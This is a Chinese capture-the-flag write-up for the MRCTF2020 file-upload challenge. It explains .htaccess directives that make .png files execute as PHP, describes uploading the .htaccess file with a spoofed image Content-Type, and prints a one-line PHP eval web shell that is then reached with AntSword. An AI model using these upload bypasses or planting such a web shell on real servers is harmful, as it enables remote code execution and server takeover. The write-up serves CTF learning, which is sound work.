[MRCTF2020]你传你🐎呢之.htaccess

前言

最近，也是遇到了文件上传的文件，自己搭的靶场都不能用，今天，在这里又遇到了这个题。简单总结下，内容来自互联网，若有侵权，联系我。

.htaccess简介

.htaccess文件（分布式配置文件），提供了针对目录改变配置的方法， 就是在一个特定的文件目录中放置一个包含多个指令的文件，以作用于此

目 录及其子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache 的allowOverride指令来设置。httpd.conf文件中设置

.htaccess的利用

　　将下面的内容写入.htaccess

0x01

这里时是要包含bbb的文件，都会被当成php代码执行

<FilesMatch "bbb">
SetHandler application/x-httpd-php
</FilesMatch>

0x02

这种方法时，后面的.png文件能被当成php代码执行，如果想换成别的改扩展名就可以

AddType application/x-httpd-php .png

赛题详解

这里我们的思路是，将.htaccess文件上传时，抓包，然后改Content-Type的类型为  image/jpeg的形式上传，当然这道题，image/png的

文件类型也可以上传，至于gif可不可以我没有试，感觉应该可以。然后先上传.htaccess文件，然后上传图片，通过蚁剑去连接。好了，

废话不多说了下面我们开始做题吧

0x01 上传.htaccess文件

来到题目的页面，我们上传.htaccess,然后抓包改Content-Type的值，改成image/jpeg,然后放包。这里我们用的是第二种

0x02 上传图片

改完之后，我们再继续上传图片就可以。当然要是以.png的后缀名文件。

bbb.png内容：

<?php eval($_POST['hack']);?>

我们在这里上传的是bbb.png文件

得到这个路径，我们需要的是首页的url拼接上upload后面的路径：/upload/4c1f01c73cb453aec997d1699d8f0e75/bbb.png

0x03 蚁剑连接

然后通过蚁剑连接,密码为hack。然后在根目录下发现flag

这样，我们这道题就完成了。

总结一下，对这个.htaccess又加深了了解，不错，头疼了好几天，之前上传这个没一个成功的。好了谢谢大家的观看。觉得好的可以给个推荐，什么的。